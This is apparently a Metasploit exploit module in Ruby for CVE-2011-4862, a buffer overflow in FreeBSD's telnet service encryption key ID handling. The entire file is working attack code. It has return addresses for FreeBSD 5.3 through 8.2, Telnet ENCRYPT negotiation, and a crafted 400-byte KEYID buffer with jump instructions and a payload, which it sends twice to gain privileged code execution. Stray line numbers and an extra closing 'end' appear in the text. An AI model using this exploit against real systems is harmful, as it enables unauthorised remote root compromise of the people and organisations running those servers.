# -*- coding: binary -*-
3
##
4
# This module requires Metasploit: https://metasploit.com/download
5
# Current source: https://github.com/rapid7/metasploit-framework
6
##
7
8
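class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Telnet
  include Msf::Exploit::BruteTargets

  # Telnet ENCRYPT option (0x26, RFC 2946) suboptions used below.
  # IAC SB ENCRYPT IS DES_CFB64 CFB64_IV <8 IV bytes> IAC SE
  ENC_INIT = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0".freeze
  # IAC SB ENCRYPT ENC_KEYID ... (the KEYID body is appended, then END_SUBOPTION)
  ENC_KEYID = "\xff\xfa\x26\x07".freeze
  # IAC SE
  END_SUBOPTION = "\xff\xf0".freeze
  # Prefix of the server's ENCRYPT REPLY that signals encryption is accepted.
  ENC_REPLY_MARKER = "\xff\xfa\x26\x02\x01".freeze
  # Size of the oversized KEYID body sent to overflow the fixed keyid buffer.
  KEY_ID_LEN = 400
  # Upper bound on socket reads while waiting for the ENCRYPT REPLY, so a
  # peer that keeps sending unrelated data cannot keep us in the loop forever.
  MAX_REPLY_READS = 16

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the encryption option handler of the
          FreeBSD telnet service.
        },
        'Author' => [
          'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>',
          'Brandon Perry <bperry.volatile[at]gmail.com>',
          'Dan Rosenberg',
          'hdm'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2011-4862'],
          ['OSVDB', '78020'],
          ['BID', '51182'],
          ['EDB', '18280']
        ],
        'Privileged' => true,
        'Platform' => 'bsd',
        'Arch' => [ ARCH_X86 ],
        'Payload' => {
          # 128 bytes fit between offset 192 and the end of the 400-byte KEYID
          # body; see build_key_id for the caveat when the payload contains 0xff.
          'Space' => 128,
          'BadChars' => "\x00"
        },

        'Targets' => [
          [ 'Automatic', {} ],
          [ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx
          [ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx
          [ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx
          [ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx
          [ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx
          [ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx
          [ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx
          [ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx
          # [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)
          [ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return
          # Versions 5.2 and below do not support encryption
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2011-12-23',
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_RESTARTS, ],
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        }
      )
    )
  end

  # Entry point invoked (via BruteTargets) once per concrete target.
  #
  # target - the Msf::Module::Target being attempted; its 'Ret' entry is the
  #          address placed in the overflowed buffer (see the target table).
  #
  # Sends the KEYID overflow twice: the first request overwrites a pointer,
  # the second request makes the server call through it. Returns early
  # (without raising) when the server gives no reply to the first request,
  # so one unresponsive/crashed target does not abort the remaining ones.
  def exploit_target(target)
    ret = target['Ret']
    # BruteTargets is expected to never hand us the 'Automatic' entry, but a
    # nil Ret would otherwise surface as NoMethodError on `nil - 20` below.
    fail_with(Failure::BadConfig, "No return address for target '#{target.name}'") unless ret

    connect
    # Render the banner as hex/ASCII so control bytes from the untrusted
    # server are not written raw to the operator's console.
    vprint_status(Rex::Text.to_hex_ascii(banner.to_s))

    sploit = ENC_KEYID + build_key_id(ret) + END_SUBOPTION

    negotiate_encryption

    # The first request smashes the pointer
    print_status('Sending first payload')
    sock.put(sploit)

    # get_once returns nil on timeout and may raise if the peer closed the
    # connection (e.g. the service crashed on a wrong Ret). Mirror the rescue
    # used while waiting for the ENCRYPT REPLY so both cases are reported the
    # same way, and release the socket on this early-exit path too.
    data = begin
      sock.get_once(-1, 5)
    rescue StandardError
      nil
    end
    unless data
      print_status('Server did not respond to first payload')
      disconnect
      return
    end

    # Some delay between each request seems necessary in some cases
    ::IO.select(nil, nil, nil, 0.5)

    # The second request results in the pointer being called
    print_status('Sending second payload...')
    sock.put(sploit)

    handler

    ::IO.select(nil, nil, nil, 0.5)
    disconnect
  end

  # Builds the KEY_ID_LEN-byte KEYID body.
  #
  # ret - the target's 'Ret' address (an Integer).
  #
  # Layout (offsets in bytes):
  #   0   : "\xeb\x76" — jmp +0x76, i.e. from offset 2 to offset 120
  #   72  : ret - 20 (little-endian)
  #   76  : ret      (little-endian)
  #   80  : 112 random bytes — some of these can get mangled, so they are
  #         jumped over rather than relied on
  #   120 : "\xeb\x46" — jmp +0x46, i.e. from offset 122 to offset 192
  #   192 : the encoded payload
  # Everything else is random alphanumeric filler.
  def build_key_id(ret)
    # Telnet requires a literal 0xff (IAC) in data to be doubled. Only the
    # payload is escaped here; none of the Ret values in the target table
    # contain a 0xff byte, and the filler/jumps are alphanumeric or < 0xff.
    penc = payload.encoded.gsub("\xff", "\xff\xff")

    key_id = Rex::Text.rand_text_alphanumeric(KEY_ID_LEN)
    key_id[0, 2] = "\xeb\x76"
    key_id[72, 4] = [ ret - 20 ].pack('V')
    key_id[76, 4] = [ ret ].pack('V')
    key_id[80, 112] = Rex::Text.rand_text_alphanumeric(112)
    key_id[120, 2] = "\xeb\x46"
    # NOTE: the escaped payload can exceed the 208 bytes left after offset
    # 192 (128 bytes of payload that is mostly 0xff doubles to 256); Ruby's
    # String#[]= then extends key_id past KEY_ID_LEN rather than truncating.
    key_id[192, penc.length] = penc
    key_id
  end

  # Sends ENC_INIT and waits until the server's ENCRYPT REPLY arrives.
  #
  # Received data is accumulated so a reply split across TCP segments is
  # still recognised. A read timeout, a dropped connection, or more than
  # MAX_REPLY_READS reads without the marker all fail the module with the
  # same message; note that a telnetd with encryption disabled or removed
  # looks exactly like this from the outside.
  def negotiate_encryption
    sock.put(ENC_INIT)

    received = ''
    MAX_REPLY_READS.times do
      chunk = begin
        sock.get_once(-1, 5)
      rescue StandardError
        nil
      end
      fail_with(Failure::Unknown, 'This system does not support encryption') unless chunk
      received << chunk
      return if received.index(ENC_REPLY_MARKER)
    end

    fail_with(Failure::Unknown, 'This system does not support encryption')
  end
end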
end
138